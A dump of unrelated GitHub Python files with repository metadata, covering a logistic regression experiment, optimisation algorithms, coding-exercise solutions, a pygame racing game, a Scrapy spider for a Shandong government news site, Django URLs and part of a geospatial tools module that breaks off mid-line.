now\")\n\nX_train = pd.read_csv(src + 'X_tr.csv', delim_whitespace=True)\ny_train = pd.read_csv(src + 'y_tr.csv', delim_whitespace=True)\nX_test = pd.read_csv(src + 'X_te.csv', delim_whitespace=True)\ny_test = pd.read_csv(src + 'y_te.csv', delim_whitespace=True)\n\nX = torch.tensor(X_train.values, dtype = torch.float)\nX = torch.cat([X, torch.ones(X.shape[0], 1, dtype = torch.float)], dim = -1)\ny = torch.tensor(y_train.values, dtype = torch.float).view(-1)\ny[y == 0] = -1\nparams[\"N\"] = X.shape[0]\n \nX_test = torch.tensor(X_test.values, dtype = torch.float)\nX_test = torch.cat([X_test, torch.ones(X.shape[0], 1, dtype = torch.float)], dim = -1)\ny_test = torch.tensor(y_test.values, dtype = torch.float).view(-1)\ny_test[y_test == 0] = -1\n\n\nlosses = []\ntest_nlls = []\ncovars = []\nfinal_nlls = []\nfor rank in params[\"max_ranks\"]:\n model = LogisticRegression(X.shape[1], max_rank = rank)\n l, tl = train(model, X, y, params, X_test = X_test, y_test = y_test)\n covars.append(model.U @ model.U.t() + torch.diag(model.d))\n losses.append(l)\n test_nlls.append(tl)\n final_nlls.append(model.nll_loss(X_test, y_test, \n require_grads = False, \n n_samples = 2000).item())\n \nfull_model = LogisticRegressionFull(X.shape[1])\nlf, tlf = train(full_model, X, y, params, X_test = X_test, y_test = y_test)\ncovars.append(torch.inverse(full_model.Sigma))\nfinal_nlls.append(full_model.nll_loss(X_test, y_test, \n require_grads = False, \n n_samples = 2000).item())\n\nprint(final_nlls)\n\ndir = 'experiments/SLANG/lr'\nif not os.path.exists(dir):\n os.makedirs(dir)\n\nfig, axes = plt.subplots(ncols=2, figsize=(10, 3))\nfor i, l in enumerate(losses):\n axes[0].plot(np.log(np.arange(1, len(l[::20]) + 1)), l[::20], label = \"SLANG-{}\".format(params[\"max_ranks\"][i]))\naxes[0].plot(np.log(np.arange(1, len(lf[::20]) + 1)), lf[::20], label = 'Full-Gaussian')\naxes[0].legend()\naxes[0].set_title('Train Loss')\n\n\nfor i, l in enumerate(test_nlls):\n axes[1].plot(np.log(np.arange(1, len(l) + 1)), l, label = \"SLANG-{}\".format(params[\"max_ranks\"][i]))\naxes[1].plot(np.log(np.arange(1, len(tlf) + 1)), tlf, label = 'Full-Gaussian')\naxes[1].legend()\naxes[1].set_title('Test NLLS')\n\nfig.savefig(dir + '/NLLS.png')\n\nnames = ['SLANG-{}'.format(rank) for rank in params[\"max_ranks\"]]\nif params[\"do_full_model\"]:\n names += [\"Full\"]\nfor i, covar in enumerate(covars):\n plt.imsave(dir + '/' + names[i] + 'covar_inverse.png', covar.detach())\n plt.imsave(dir + '/' + names[i] + 'covar.png', torch.inverse(covar).detach())\n","repo_name":"lamantinushka/StructuredCovariance","sub_path":"run_slang_lr.py","file_name":"run_slang_lr.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"8676636588","text":"import time\nimport random\nimport math\n\ndef random_optimize(domain, fitness_function, n=9999):\n \"\"\"\n Optimizes overall schedule by creating n random guesses\n :param domain: list of (max,min) tuples\n specifying min and max values for each variable\n :param fitness_function: computes overall cost of a solution\n :return: best solution with the lowest cost\n :param n: max number of iterations\n \"\"\"\n best = None\n bestr = None\n for iter in range(n):\n # Create a random solution\n r=[random.randint(domain[i][0],domain[i][1])\n for i in range(len(domain))]\n \n # Get the cost\n cost=fitness_function(r)\n \n # Compare it to the best one so far\n if best is None or cost < best:\n best=cost\n bestr=r\n\n return r\n\n\ndef hillclimb_optimize(domain,fitness_function):\n # Create an initial random solution\n sol=[random.randint(domain[i][0],domain[i][1])\n for i in range(len(domain))]\n\n # Main loop\n while 1:\n # Create list of neighboring solutions\n neighbors=[]\n\n for j in range(len(domain)):\n # One away in each direction\n if sol[j]>domain[j][0]:\n neighbors.append(sol[0:j]+[sol[j]+1]+sol[j+1:])\n if sol[j] 0.1:\n # Choose one of the indices\n i = random.randint(0,len(domain)-1)\n\n # Choose a direction to change it\n dir = random.randint(-step,step)\n\n # Create a new list with one of the values changed\n vecb = vec[:]\n vecb[i] += dir\n if vecb[i] < domain[i][0]:\n vecb[i] = domain[i][0]\n elif vecb[i] > domain[i][1]:\n vecb[i] = domain[i][1]\n\n # Calculate the current cost and the new cost\n ea = fitness_function(vec)\n eb = fitness_function(vecb)\n p = pow(math.e,(-eb-ea)/T)\n\n # Is it better, or does it make the probability\n # cutoff?\n if eb < ea or random.random() < p:\n vec = vecb\n\n # Decrease the temperature\n T = T*cool\n\n return vec\n\n\ndef genetic_optimize(domain,fitness_function,\n popsize=100,step=1,\n mutprob=0.2,elite=0.2,n=100):\n # Mutation Operation\n def mutate(vec):\n i=random.randint(0,len(domain)-1)\n if random.random()<0.5 and vec[i]>domain[i][0]:\n return vec[0:i]+[vec[i]-step]+vec[i+1:]\n elif vec[i] List[int]:\n '''Defined hash table to keep track of all seen elements with their indices'''\n seen = {}\n for i in range(len(nums)):\n \n '''Using diff with target approach to find the second number in the array'''\n diff = target - nums[i]\n\n '''Return if the second number is seen'''\n if diff in seen:\n return [seen[diff], i]\n else:\n '''Else add what we saw'''\n seen[nums[i]] = i \n","repo_name":"Pihu1998/Leetcode_questions","sub_path":"two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29733343188","text":"#Car Racing Game\r\n#Inspired by Tech with Tim | https://www.youtube.com/watch?v=L3ktUWfAMPg\r\n#11/28/22\r\n#On Part 2 @0:00\r\n\r\nimport pygame\r\nimport time\r\nimport math\r\nfrom utils import scale_image,blit_rotate_center\r\n\r\n\r\n\r\n#load the images in\r\nGRASS = scale_image(pygame.image.load(\"images/lawn.png\"),2.5)\r\nTRACK = scale_image(pygame.image.load(\"images/track_small.png\"),1.1)\r\n\r\nTRACK_BORDER = scale_image(pygame.image.load(\"images/track_outline_small.png\"),1.1)\r\nFINISH = scale_image(pygame.image.load(\"images/finish_line.png\"),.1)\r\n\r\nRED_CAR = scale_image(pygame.image.load(\"images/red_car_small.png\"),.05)\r\nGREEN_CAR = scale_image(pygame.image.load(\"images/green_car_small.png\"),.03)\r\n\r\nWIDTH, HEIGHT = TRACK.get_width(), TRACK.get_height()\r\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\r\npygame.display.set_caption(\"Racing Game!\")\r\n\r\n#display images\r\nFPS = 60\r\n\r\nclass Abstract_Car:\r\n def __init__(self,max_vel,rotation_vel):\r\n self.max_vel = max_vel\r\n self.vel = 0 #determines the speed of the car\r\n self.rotation_vel = rotation_vel\r\n self.angle = 0\r\n self.img = self.IMG\r\n self.x, self.y = self.START_POS\r\n self.acceleration = 0.1\r\n \r\n def rotate(self,left=False, right=False):\r\n if left:\r\n self.angle += self.rotation_vel\r\n elif right:\r\n self.angle -= self.rotation_vel\r\n\r\n def draw(self,win):\r\n blit_rotate_center(win,self.img,(self.x,self.y),self.angle)\r\n\r\n def move_foward(self):\r\n self.vel = min(self.vel + self.acceleration, self.max_vel) # if the accerlation is greater than the max vel, it defaults to the max vel\r\n self.move()\r\n\r\n def move(self):\r\n radians = math.radians(self.angle)\r\n #check yucky trig pic\r\n vertical = math.cos(radians) * self.vel\r\n horizontal = math.sin(radians) * self.vel\r\n\r\n #plus returns positive values, makes car go foward, minus returns negative values, makes car go backwards\r\n self.y += vertical\r\n self.x += horizontal\r\n\r\n def reduce_speed(self):\r\n self.vel = max(self.vel-self.acceleration /2,0) #if the value is negative we dont wanna go backwards\r\n self.move()\r\n\r\nclass Player_Car(Abstract_Car):\r\n IMG = RED_CAR\r\n START_POS = (100,200)\r\n\r\ndef draw(win,images,player_Car):\r\n for img,pos in images:\r\n win.blit(img,pos)\r\n\r\n player_car.draw(win)\r\n pygame.display.update()\r\n\r\n\r\nrun = True\r\nclock = pygame.time.Clock()\r\nimages = [(GRASS, (0,0)),(TRACK, (0,0))]\r\nplayer_car = Player_Car(4,4)#higher the number the faster\r\n\r\nwhile run:\r\n clock.tick(FPS)\r\n\r\n draw(WIN,images,player_car)\r\n \r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n break\r\n\r\n keys = pygame.key.get_pressed()\r\n moved = False\r\n\r\n # rotating the car keys\r\n if keys[pygame.K_a]:\r\n player_car.rotate(left = True)\r\n if keys[pygame.K_d]:\r\n player_car.rotate(right = True)\r\n if keys[pygame.K_w]:\r\n moved = True\r\n player_car.move_foward()\r\n\r\n if not moved:\r\n player_car.reduce_speed()\r\n\r\n \r\npygame.quit() ","repo_name":"Bahrens96/Car_racing_game","sub_path":"Racing Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37438105678","text":"# Faire un programme python qui construit des pyramide d’étoile. Le programme demande à l’utilisateur le nombre de ligne et le programme dessine une pyramide.\r\n\r\nvaleurInitiale = int(input(\"Choississez votre nombre de ligne \")) \r\n\r\nstar = 1 \r\nspace = valeurInitiale - 1\r\nline = 0\r\n\r\nwhile line < valeurInitiale:\r\n\r\n print(space * \" \", star * \"*\")\r\n star = star + 2\r\n space = space - 1\r\n line = line + 1","repo_name":"Charlymaitre/30exo_python","sub_path":"30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8853178516","text":"n = int(input())\n\nif n == 1:\n print(1)\n exit(0)\nif n == 2:\n print(2)\n exit(0)\n\ncache = [0] * 3\ncache[0] = 1\ncache[1] = 2\ncount = 2\nwhile count != n:\n cache[2] = cache[1] + cache[0]\n cache[0], cache[1] = cache[1], cache[2]\n count += 1\n\nprint(cache[1] % 15746)\n\n# 흔한 dp 피보나치 문제인데, 메모리를 빡빡하게 줘서 memoization의 메모리를 최소화했다.\n# dp의 큰 특징은 작은 부분 -> 큰부분으로 확장되는 점화식이 있다는 것과 메모이제이션.\n","repo_name":"taehwan920/Algorithm","sub_path":"baekjoon/1904_01tile.py","file_name":"1904_01tile.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20351328048","text":"import ast\n\ndef pairwise(t):\n it = iter(t)\n return zip(it,it)\n\nclass Land(object):\n def __init__(self,length,breadth):\n \"\"\"\n Create the matrix with a complete fertile land of x*y\n x is length\n y is breadth\n Matrix will be filled with 1s\n \"\"\"\n self.length = length\n self.breadth = breadth\n self.land = self._creatematrix(length,breadth)\n\n def _creatematrix(self,length,breadth,value=1):\n land = [[value for x in range(breadth)] for y in range(length)]\n return land\n\n def create_barren_land(self,left_bottom_corner,right_top_corner):\n \"\"\"\n Fill the barren land with 0\n We can calculate the coordinates with the corners that were given \n\n \"\"\"\n for x in range(left_bottom_corner[0],right_top_corner[0]+1):\n for y in range(left_bottom_corner[1],right_top_corner[1]+1):\n self.land[x][y] = 0\n\n def fill_barren_land(self,coordinates):\n \"\"\"\n Fill the barren land with the coordinates in a list\n \"\"\"\n for coord in coordinates:\n self.create_barren_land(coord[0],coord[1])\n\n def fertile_area(self):\n \"\"\"\n DFS \n Returns the area of all islands with 1s\n\n \"\"\"\n visited = set()\n result = []\n for r0, row in enumerate(self.land):\n for c0, val in enumerate(row):\n if val and (r0, c0) not in visited:\n stack = [(r0, c0)]\n visited.add((r0, c0))\n area = 0\n while stack:\n r, c = stack.pop()\n area += 1\n for nr, nc in ((r-1, c), (r+1, c), (r, c-1), (r, c+1)):\n if (0 <= nr < self.length and 0 <= nc < self.breadth\n and self.land[nr][nc] and (nr, nc) not in visited):\n stack.append((nr, nc))\n visited.add((nr, nc))\n result.append(area)\n result.sort()\n return result\n\ndef format_input(input_str):\n \"\"\"\n Format the inpurt strings into a valid list \n \n Input\n {\"48 192 351 207\", \"48 392 351 407\",\"120 52 135 547\", \"260 52 275 547\"}\n\n Output \n [[(48, 392), (351, 407)], [(48, 192), (351, 207)], [(120, 52), (135, 547)], [(260, 52), (275, 547)]]\n\n \"\"\"\n input_str = ast.literal_eval(input_str)\n landcorners = []\n y = lambda x: [(int(x[0]), int(x[1])), (int(x[2]), int(x[3]))]\n for point_str in input_str:\n landcorners.append(y(point_str.split()))\n return landcorners\n\n\n\nif __name__ == '__main__':\n barrenland_str = input(\"Do input the string of coordinates \\n\")\n land_obj = Land(400,600)\n barrenland_coord = format_input(barrenland_str)\n \n land_obj.fill_barren_land(barrenland_coord)\n result = land_obj.fertile_area()\n print(\" \".join(str(area) for area in result)) \n","repo_name":"phanichand/barrenland","sub_path":"barrenland.py","file_name":"barrenland.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30377194768","text":"from typing import List\n\n\nclass Solution:\n @staticmethod\n def coord_is_out_of_range(\n grid: List[List[str]],\n x: int,\n y: int,\n ):\n # 가로길이, 세로길이에 각각 대응해야함에 유의!\n x_is_out_of_range = x < 0 or x >= len(grid)\n y_is_out_of_range = y < 0 or y >= len(grid[0])\n\n return (x_is_out_of_range or y_is_out_of_range)\n\n def dfs(\n self,\n grid: List[List[str]],\n x: int,\n y: int,\n ):\n # 더 이상 땅이 아닌 경우?\n if self.coord_is_out_of_range(grid, x, y) or grid[x][y] != '1':\n return\n\n # 다녀온 곳에 대해 '1'이 아닌 값으로 덮어쓴다.\n grid[x][y] = '#'\n\n self.dfs(grid, x+1, y)\n self.dfs(grid, x-1, y)\n self.dfs(grid, x, y+1)\n self.dfs(grid, x, y-1)\n\n def numIslands(\n self,\n grid: List[List[str]],\n ) -> int:\n\n # 예외처리\n if not grid:\n return 0\n\n count = 0\n\n # 가로길이, 세로길이에 각각 대응해야함에 유의!\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '1':\n self.dfs(grid, i, j)\n count += 1\n\n return count\n\n\ntest1 = [\n [\"1\", \"1\", \"1\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\"],\n]\n\ntest2 = [\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"1\"],\n [\"0\", \"0\", \"1\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"1\", \"0\"],\n]\n\n\nanswer = Solution()\nprint(answer.numIslands(test1))\nprint(answer.numIslands(test2))\n","repo_name":"s3ich4n/coding_interview_self_taught","sub_path":"codes/pt4/12_graph/q32/32_number_of_islands.py","file_name":"32_number_of_islands.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20230662629","text":"import json\nimport scrapy\nfrom lxml import etree\nfrom scrapy import FormRequest\nfrom scrapy.selector import Selector\nfrom BiddingInfoSpider.spiders.base_spider import BaseSpider\nfrom BiddingInfoSpider.items import BiddinginfospiderItem\n\n\nclass ShanDongGJBW(BaseSpider):\n name = 'ShanDongGJBW'\n allowed_domains = ['gxt.shandong.gov.cn']\n start_urls = ['http://gxt.shandong.gov.cn/col/col15177/index.html']\n website_name = '山东省工业和信息化-国家部委'\n tmpl_url = 'http://ggzyjyzx.shandong.gov.cn/module/web/jpage/dataproxy.jsp?page={0}&webid=78&path=http://gxt.shandong.gov.cn/&columnid=15177&unitid=71078&webname=%25E5%25B1%25B1%25E4%25B8%259C%25E7%259C%2581%25E5%25B7%25A5%25E4%25B8%259A%25E5%2592%258C%25E4%25BF%25A1%25E6%2581%25AF%25E5%258C%2596%25E5%258E%2585&permissiontype=0'\n\n def parse_start_url(self, response):\n datastore = response.xpath('//script[@type=\"text/xml\"]/text()').get()\n # selector = etree.XML(response.body)\n if datastore:\n selector = etree.XML(datastore)\n a = selector.xpath('//nextgroup/text()')[0]\n href = etree.HTML(a).xpath('//a/@href')[0]\n req = self.make_requests_from_url(response.urljoin(href))\n req.callback = self.parse_shangdong_xml\n yield req\n\n def parse_shangdong_xml(self, response):\n # response已经完成返回xml的解析\n # datastore = etree.XML(response.text)\n html = ''.join(response.xpath('//record/text()').extract())\n\n # 产生内容页的请求\n for li in etree.HTML(html).xpath('//li'):\n item = BiddinginfospiderItem()\n a = li.xpath(\".//a\")[0]\n item['href'] = a.xpath(\".//@href\")[0]\n item['title'] = a.xpath(\".//text()\")[0]\n item['ctime'] = li.xpath('.//span//text()')[0]\n # print(item)\n yield item\n # 如果是全部爬取则继续获取下一页\n if not self.biddingInfo_update:\n selector = etree.XML(response.body)\n a = [0]\n next_select = selector.xpath('//nextgroup/text()')\n if next_select:\n a = next_select[0]\n href = etree.HTML(a).xpath('//a/@href')[0]\n req = self.make_requests_from_url(response.urljoin(href))\n req.callback = self.parse_shangdong_xml\n yield req\n\n\nclass ShanDongSWZF(ShanDongGJBW):\n name = 'ShanDongSWZF'\n start_urls = ['http://gxt.shandong.gov.cn/col/col15178/index.html']\n website_name = '山东省工业和信息化-省委政府'\n\n\nclass ShanDongBT(ShanDongGJBW):\n name = 'ShanDongBT'\n start_urls = ['http://gxt.shandong.gov.cn/col/col15178/index.html']\n website_name = '山东省工业和信息化-本厅'\n","repo_name":"LeeeetMe/BiddingInfo","sub_path":"BiddingInfoSpider/spiders/工信/ShanDongGJBW.py","file_name":"ShanDongGJBW.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9746285416","text":"from django.urls import include, path\r\nfrom rest_framework.routers import DefaultRouter\r\n\r\nfrom .views import CommentViewSet, LikePostAPIView, PostViewSet, RatingViewSet\r\n\r\napp_name = 'posts'\r\n\r\nrouter = DefaultRouter()\r\nrouter.register(r'ratings', RatingViewSet)\r\nrouter.register(r'^(?P\\d+)/comment', CommentViewSet)\r\nrouter.register(r'', PostViewSet)\r\n\r\nurlpatterns = [\r\n path('', include(router.urls)),\r\n path('like//', LikePostAPIView.as_view(), name='like-post'),\r\n]\r\n","repo_name":"Russo2642/job_solution","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37119636645","text":"## dea_spatialtools.py\n\"\"\"\nTools for spatially manipulating Digital Earth Australia data.\n\nLicense: The code in this notebook is licensed under the Apache License, \nVersion 2.0 (https://www.apache.org/licenses/LICENSE-2.0). Digital Earth \nAustralia data is licensed under the Creative Commons by Attribution 4.0 \nlicense (https://creativecommons.org/licenses/by/4.0/).\n\nContact: If you need assistance, please post a question on the Open Data \nCube Slack channel (http://slack.opendatacube.org/) or on the GIS Stack \nExchange (https://gis.stackexchange.com/questions/ask?tags=open-data-cube) \nusing the `open-data-cube` tag (you can view previously asked questions \nhere: https://gis.stackexchange.com/questions/tagged/open-data-cube). \n\nIf you would like to report an issue with this script, file one on \nGithub: https://github.com/GeoscienceAustralia/dea-notebooks/issues/new\n\nLast modified: August 2023\n\n\"\"\"\n\n# Import required packages\nimport dask\nimport fiona\nimport warnings\nimport collections\nimport odc.geo.xr\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport geopandas as gpd\nimport rasterio.features\nimport scipy.interpolate\nimport multiprocessing as mp\nfrom odc.geo.geom import Geometry\nfrom odc.geo.crs import CRS\nfrom scipy import ndimage as nd\nfrom skimage.measure import label\nfrom rasterstats import zonal_stats\nfrom skimage.measure import find_contours\nfrom geopy.geocoders import Nominatim\nfrom geopy.exc import GeocoderUnavailable, GeocoderServiceError\n\nfrom datacube.utils.cog import write_cog\nfrom shapely.geometry import LineString, MultiLineString, shape, mapping\n\n\ndef points_on_line(gdf, index, distance=30):\n \"\"\"\n Generates evenly-spaced point features along a specific line feature\n in a `geopandas.GeoDataFrame`.\n Parameters:\n -----------\n gdf : geopandas.GeoDataFrame\n A `geopandas.GeoDataFrame` containing line features with an\n index and CRS.\n index : string or int\n An value giving the index of the line to generate points along\n distance : integer or float, optional\n A number giving the interval at which to generate points along\n the line feature. Defaults to 30, which will generate a point\n at every 30 metres along the line.\n Returns:\n --------\n points_gdf : geopandas.GeoDataFrame\n A `geopandas.GeoDataFrame` containing point features at every\n `distance` along the selected line.\n \"\"\"\n\n # Select individual line to generate points along\n line_feature = gdf.loc[[index]].geometry\n\n # If multiple features are returned, take unary union\n if line_feature.shape[0] > 0:\n line_feature = line_feature.unary_union\n else:\n line_feature = line_feature.iloc[0]\n\n # Generate points along line and convert to geopandas.GeoDataFrame\n points_line = [\n line_feature.interpolate(i)\n for i in range(0, int(line_feature.length), distance)\n ]\n points_gdf = gpd.GeoDataFrame(geometry=points_line, crs=gdf.crs)\n\n return points_gdf\n\n\ndef add_geobox(ds, crs=None):\n \"\"\"\n Ensure that an xarray DataArray has a GeoBox and .odc.* accessor\n using `odc.geo`.\n\n If `ds` is missing a Coordinate Reference System (CRS), this can be\n supplied using the `crs` param.\n\n Parameters\n ----------\n ds : xarray.Dataset or xarray.DataArray\n Input xarray object that needs to be checked for spatial\n information.\n crs : str, optional\n Coordinate Reference System (CRS) information for the input `ds`\n array. If `ds` already has a CRS, then `crs` is not required.\n Default is None.\n\n Returns\n -------\n xarray.Dataset or xarray.DataArray\n The input xarray object with added `.odc.x` attributes to access\n spatial information.\n\n \"\"\"\n\n # Import the odc-geo package to add `.odc.x` attributes\n # to our input xarray object\n import odc.geo.xr\n\n # If a CRS is not found, use custom provided CRS\n if ds.odc.crs is None and crs is not None:\n ds = ds.odc.assign_crs(crs)\n elif ds.odc.crs is None and crs is None:\n raise ValueError(\n \"Unable to determine `ds`'s coordinate \"\n \"reference system (CRS). Please provide a \"\n \"CRS using the `crs` parameter \"\n \"(e.g. `crs='EPSG:3577'`).\"\n )\n\n return ds\n\n\ndef xr_vectorize(\n da,\n attribute_col=None,\n crs=None,\n dtype=\"float32\",\n output_path=None,\n verbose=True,\n **rasterio_kwargs,\n):\n \"\"\"\n Vectorises a raster ``xarray.DataArray`` into a vector\n ``geopandas.GeoDataFrame``.\n\n Parameters\n ----------\n da : xarray.DataArray\n The input ``xarray.DataArray`` data to vectorise.\n attribute_col : str, optional\n Name of the attribute column in the resulting\n ``geopandas.GeoDataFrame``. Values from ``da`` converted\n to polygons will be assigned to this column. If None,\n the column name will default to 'attribute'.\n crs : str or CRS object, optional\n If ``da``'s coordinate reference system (CRS) cannot be\n determined, provide a CRS using this parameter.\n (e.g. 'EPSG:3577').\n dtype : str, optional\n Data type of must be one of int16, int32, uint8, uint16,\n or float32\n output_path : string, optional\n Provide an optional string file path to export the vectorised\n data to file. Supports any vector file formats supported by\n ``geopandas.GeoDataFrame.to_file()``.\n verbose : bool, optional\n Print debugging messages. Default True.\n **rasterio_kwargs :\n A set of keyword arguments to ``rasterio.features.shapes``.\n Can include `mask` and `connectivity`.\n\n Returns\n -------\n gdf : geopandas.GeoDataFrame\n\n \"\"\"\n\n # Add GeoBox and odc.* accessor to array using `odc-geo`\n da = add_geobox(da, crs)\n\n # Run the vectorizing function\n vectors = rasterio.features.shapes(\n source=da.data.astype(dtype), transform=da.odc.transform, **rasterio_kwargs\n )\n\n # Convert the generator into a list\n vectors = list(vectors)\n\n # Extract the polygon coordinates and values from the list\n polygons = [polygon for polygon, value in vectors]\n values = [value for polygon, value in vectors]\n\n # Convert polygon coordinates into polygon shapes\n polygons = [shape(polygon) for polygon in polygons]\n\n # Create a geopandas dataframe populated with the polygon shapes\n attribute_name = attribute_col if attribute_col is not None else \"attribute\"\n gdf = gpd.GeoDataFrame(\n data={attribute_name: values}, geometry=polygons, crs=da.odc.crs\n )\n\n # If a file path is supplied, export to file\n if output_path is not None:\n if verbose:\n print(f\"Exporting vector data to {output_path}\")\n gdf.to_file(output_path)\n\n return gdf\n\n\ndef xr_rasterize(\n gdf,\n da,\n attribute_col=None,\n crs=None,\n name=None,\n output_path=None,\n verbose=True,\n **rasterio_kwargs,\n):\n \"\"\"\n Rasterizes a vector ``geopandas.GeoDataFrame`` into a\n raster ``xarray.DataArray``.\n\n Parameters\n ----------\n gdf : geopandas.GeoDataFrame\n A ``geopandas.GeoDataFrame`` object containing the vector\n data you want to rasterise.\n da : xarray.DataArray or xarray.Dataset\n The shape, coordinates, dimensions, and transform of this object\n are used to define the array that ``gdf`` is rasterized into.\n It effectively provides a spatial template.\n attribute_col : string, optional\n Name of the attribute column in ``gdf`` containing values for\n each vector feature that will be rasterized. If None, the\n output will be a boolean array of 1's and 0's.\n crs : str or CRS object, optional\n If ``da``'s coordinate reference system (CRS) cannot be\n determined, provide a CRS using this parameter.\n (e.g. 'EPSG:3577').\n name : str, optional\n An optional name used for the output ``xarray.DataArray`.\n output_path : string, optional\n Provide an optional string file path to export the rasterized\n data as a GeoTIFF file.\n verbose : bool, optional\n Print debugging messages. Default True.\n **rasterio_kwargs :\n A set of keyword arguments to ``rasterio.features.rasterize``.\n Can include: 'all_touched', 'merge_alg', 'dtype'.\n\n Returns\n -------\n da_rasterized : xarray.DataArray\n The rasterized vector data.\n \"\"\"\n\n # Add GeoBox and odc.* accessor to array using `odc-geo`\n da = add_geobox(da, crs)\n\n # Reproject vector data to raster's CRS\n gdf_reproj = gdf.to_crs(crs=da.odc.crs)\n\n # If an attribute column is specified, rasterise using vector\n # attribute values. Otherwise, rasterise into a boolean array\n if attribute_col is not None:\n # Use the geometry and attributes from `gdf` to create an iterable\n shapes = zip(gdf_reproj.geometry, gdf_reproj[attribute_col])\n else:\n # Use geometry directly (will produce a boolean numpy array)\n shapes = gdf_reproj.geometry\n\n # Rasterise shapes into a numpy array\n im = rasterio.features.rasterize(\n shapes=shapes,\n out_shape=da.odc.geobox.shape,\n transform=da.odc.geobox.transform,\n **rasterio_kwargs,\n )\n\n # Convert numpy array to a full xarray.DataArray\n # and set array name if supplied\n da_rasterized = odc.geo.xr.wrap_xr(im=im, gbox=da.odc.geobox)\n da_rasterized = da_rasterized.rename(name)\n\n # If a file path is supplied, export to file\n if output_path is not None:\n if verbose:\n print(f\"Exporting raster data to {output_path}\")\n write_cog(da_rasterized, output_path, overwrite=True)\n\n return da_rasterized\n\n\ndef subpixel_contours(\n da,\n z_values=[0.0],\n crs=None,\n attribute_df=None,\n output_path=None,\n min_vertices=2,\n dim=\"time\",\n time_format=\"%Y-%m-%d\",\n errors=\"ignore\",\n verbose=True,\n):\n \"\"\"\n Uses `skimage.measure.find_contours` to extract multiple z-value\n contour lines from a two-dimensional array (e.g. multiple elevations\n from a single DEM), or one z-value for each array along a specified\n dimension of a multi-dimensional array (e.g. to map waterlines\n across time by extracting a 0 NDWI contour from each individual\n timestep in an xarray timeseries).\n\n Contours are returned as a geopandas.GeoDataFrame with one row per\n z-value or one row per array along a specified dimension. The\n `attribute_df` parameter can be used to pass custom attributes\n to the output contour features.\n\n Last modified: May 2023\n\n Parameters\n ----------\n da : xarray DataArray\n A two-dimensional or multi-dimensional array from which\n contours are extracted. If a two-dimensional array is provided,\n the analysis will run in 'single array, multiple z-values' mode\n which allows you to specify multiple `z_values` to be extracted.\n If a multi-dimensional array is provided, the analysis will run\n in 'single z-value, multiple arrays' mode allowing you to\n extract contours for each array along the dimension specified\n by the `dim` parameter.\n z_values : int, float or list of ints, floats\n An individual z-value or list of multiple z-values to extract\n from the array. If operating in 'single z-value, multiple\n arrays' mode specify only a single z-value.\n crs : string or CRS object, optional\n If ``da``'s coordinate reference system (CRS) cannot be\n determined, provide a CRS using this parameter.\n (e.g. 'EPSG:3577').\n output_path : string, optional\n The path and filename for the output shapefile.\n attribute_df : pandas.Dataframe, optional\n A pandas.Dataframe containing attributes to pass to the output\n contour features. The dataframe must contain either the same\n number of rows as supplied `z_values` (in 'multiple z-value,\n single array' mode), or the same number of rows as the number\n of arrays along the `dim` dimension ('single z-value, multiple\n arrays mode').\n min_vertices : int, optional\n The minimum number of vertices required for a contour to be\n extracted. The default (and minimum) value is 2, which is the\n smallest number required to produce a contour line (i.e. a start\n and end point). Higher values remove smaller contours,\n potentially removing noise from the output dataset.\n dim : string, optional\n The name of the dimension along which to extract contours when\n operating in 'single z-value, multiple arrays' mode. The default\n is 'time', which extracts contours for each array along the time\n dimension.\n time_format : string, optional\n The format used to convert `numpy.datetime64` values to strings\n if applied to data with a \"time\" dimension. Defaults to\n \"%Y-%m-%d\".\n errors : string, optional\n If 'raise', then any failed contours will raise an exception.\n If 'ignore' (the default), a list of failed contours will be\n printed. If no contours are returned, an exception will always\n be raised.\n verbose : bool, optional\n Print debugging messages. Default is True.\n\n Returns\n -------\n output_gdf : geopandas geodataframe\n A geopandas geodataframe object with one feature per z-value\n ('single array, multiple z-values' mode), or one row per array\n along the dimension specified by the `dim` parameter ('single\n z-value, multiple arrays' mode). If `attribute_df` was\n provided, these values will be included in the shapefile's\n attribute table.\n \"\"\"\n\n def _contours_to_multiline(da_i, z_value, min_vertices=2):\n \"\"\"\n Helper function to apply marching squares contour extraction\n to an array and return a data as a shapely MultiLineString.\n The `min_vertices` parameter allows you to drop small contours\n with less than X vertices.\n \"\"\"\n\n # Extracts contours from array, and converts each discrete\n # contour into a Shapely LineString feature. If the function\n # returns a KeyError, this may be due to an unresolved issue in\n # scikit-image: https://github.com/scikit-image/scikit-image/issues/4830\n # A temporary workaround is to peturb the z-value by a tiny\n # amount (1e-12) before using it to extract the contour.\n try:\n line_features = [\n LineString(i[:, [1, 0]])\n for i in find_contours(da_i.data, z_value)\n if i.shape[0] >= 